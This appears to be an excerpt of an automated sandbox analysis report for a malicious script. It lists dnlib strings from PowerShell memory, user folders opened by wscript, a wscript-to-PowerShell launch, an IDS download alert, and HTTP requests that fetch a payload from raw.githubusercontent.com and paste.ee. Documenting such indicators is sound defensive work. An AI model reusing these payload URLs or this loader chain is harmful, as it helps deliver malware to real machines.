Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb5 source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000008.00000002.1732143246.000001B9E00F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49709 -> 188.114.96.3:443
Source: unknown | DNS query: name: paste.ee
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: global traffic | HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /d/DjfVC/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | IP Address: 185.199.108.133
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: paste.ee
Source: powershell.exe, 00000008.00000002.1730333035.000001B9DFE59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000008.00000002.1732092735.000001B9DFFF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000008.00000002.1698437670.000001B9D7E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C826E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C94F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000005.00000002.1609296916.000002641E6CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F80085000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C7E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1609296916.000002641E67B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.1609296916.000002641E699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F8005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1748319451.0000024F80027000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C7E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C975C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C90BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1698437670.000001B9D7E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1667066849.000001B9C98A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1667066849.000001B9C953C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
